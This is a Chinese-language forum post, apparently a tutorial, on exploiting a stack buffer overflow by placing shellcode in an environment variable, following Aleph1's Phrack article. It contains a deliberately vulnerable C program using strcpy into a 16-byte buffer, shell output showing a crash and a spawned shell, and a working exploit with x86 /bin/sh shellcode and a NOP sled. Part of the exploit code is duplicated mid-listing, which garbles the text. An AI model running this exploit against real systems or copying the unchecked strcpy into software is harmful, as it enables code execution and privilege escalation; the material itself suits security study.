?? shellcode技術(shù)探討續(xù)三.htm
字號(hào):
<HTML>
<HEAD>
<meta name="Phorum Version" content="3.1">
<meta name="Phorum DB" content="mysql">
<meta name="PHP Version" content="4.0.0">
<TITLE> shellcode技術(shù)探討續(xù)三</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" LINK="#0000FF" ALINK="#FF0000" VLINK="#330000">
shellcode技術(shù)探討續(xù)三
<BR>
<BR>--------------------------------------------------------------------------------
<BR>
<BR>
<BR>
<BR>Aleph1的辦法是將shellcode放到環(huán)境變量里傳遞給有弱點(diǎn)的函數(shù),用環(huán)境變量
<BR>的地址做為返回地址,這樣我們可以只用24個(gè)字節(jié)的buffer來覆蓋掉返回地址,
<BR>而不需要改動(dòng)參數(shù).
<BR>
<BR>完全避免修改任何參數(shù)是不可能的,即使用24個(gè)字節(jié)覆蓋,最后的終止字符('\0')
<BR>仍然會(huì)修改第一個(gè)參數(shù)的最后一個(gè)字節(jié).不過這種方法仍然有它的可取的地方,不
<BR>用為buffer的大小考慮太多,環(huán)境變量可以設(shè)的比較大只要用NOP填充,后面跟著
<BR>shellcode就行了.
<BR>下面這個(gè)overflow.c我稍微改了改,ex.c是從Aleph1的文章里摘出來的.
<BR>你可以在 http://www.phrack.com/search.phtml?view&article=p49-14
<BR>看到全文,比較長,我就不貼在這里了
<BR>
<BR>[tt@hell tt]$ ./overflow `perl -e 'print "A"x15'`
<BR>AAAAAAAAAAAAAAA
<BR>[tt@hell tt]$ ./overflow `perl -e 'print "A"x16'`
<BR>AAAAAAAAAAAAAAAA
<BR>Segmentation fault (core dumped)
<BR>[tt@hell tt]$ ./ex1
<BR>Using address: 0xbffffd38
<BR>
<BR>bash$ exit
<BR>
<BR>/* gcc -o overflow overflow.c */
<BR>int func ( char * ptr )
<BR> {
<BR> char buffer[ 16 ] = "";
<BR> strcpy( buffer, ptr );
<BR> puts( ptr );
<BR> return 0;
<BR> }
<BR>
<BR>int main ( int argc, char * argv[] )
<BR>{
<BR> if ( argc > 1 )
<BR> {
<BR> func( argv[1] );
<BR> }
<BR> else
<BR> {
<BR> puts( "Argv[1] needed!" );
<BR> }
<BR> return 0;
<BR>}
<BR>
<BR>/* gcc -o ex ex.c */
<BR>
<BR>#include <stdlib.h>
<BR>
<BR>#define DEFAULT_OFFSET 0
<BR>#define DEFAULT_BUFFER_SIZE 24
<BR>#define DEFAULT_EGG_SIZE 2048
<BR>#define NOP 0x90
<BR>
<BR>char shellcode[] =
<BR> "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
<BR> "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
<BR> "\x80\xe8\xdc\xff\xff\xff/bin/sh";
<BR>
<BR>unsigned long get_esp(void) {
<BR> __asm__("movl %esp,%eax");
<BR>}
<BR>
<BR>void main(int argc, char *argv[]) {
<BR> char *buffer, *ptr, *egg;
<BR> long *addr_ptr, addr;
<BR> int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
<BR> int i, eggsize=DEFAULT_EGG_SIZE;
<BR>
<BR> if (argc > 1) bsize = atoi(argv[1]);
<BR> if (argc > 2) offset = atoi(argv[2]);
<BR> if (argc > 3) eggsize = atoi(argv[3]);
<BR>
<BR>
<BR> if (!(buffer = malloc(bsize))) {
<BR> printf("Can't allocate memory.\n");
<BR> exit(0);
<BR> }
<BR> if (!(egg = malloc(eggsize))) {
<BR>
<BR>void main(int argc, char *argv[]) {
<BR> char *buffer, *ptr, *egg;
<BR> long *addr_ptr, addr;
<BR> int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
<BR> int i, eggsize=DEFAULT_EGG_SIZE;
<BR>
<BR> if (argc > 1) bsize = atoi(argv[1]);
<BR> if (argc > 2) offset = atoi(argv[2]);
<BR> if (argc > 3) eggsize = atoi(argv[3]);
<BR>
<BR>
<BR> if (!(buffer = malloc(bsize))) {
<BR> printf("Can't allocate memory.\n");
<BR> exit(0);
<BR> }
<BR> if (!(egg = malloc(eggsize))) {
<BR> printf("Can't allocate memory.\n");
<BR> exit(0);
<BR> }
<BR>
<BR> addr = get_esp() - offset;
<BR> printf("Using address: 0x%x\n", addr);
<BR>
<BR> ptr = buffer;
<BR> addr_ptr = (long *) ptr;
<BR> for (i = 0; i < bsize; i+=4)
<BR> *(addr_ptr++) = addr;
<BR>
<BR> ptr = egg;
<BR> for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
<BR> *(ptr++) = NOP;
<BR>
<BR> for (i = 0; i < strlen(shellcode); i++)
<BR> *(ptr++) = shellcode[i];
<BR>
<BR> egg[eggsize - 1] = '\0';
<BR>
<BR> memcpy(egg,"EGG=",4);
<BR> putenv(egg);
<BR> execl( "/home/tt/overflow", "overflow", buffer, 0 );
<BR>
<BR>}
<BR>
<BR>
<BR>
</body>
</html>
?? 快捷鍵說明
復(fù)制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號(hào)
Ctrl + =
減小字號(hào)
Ctrl + -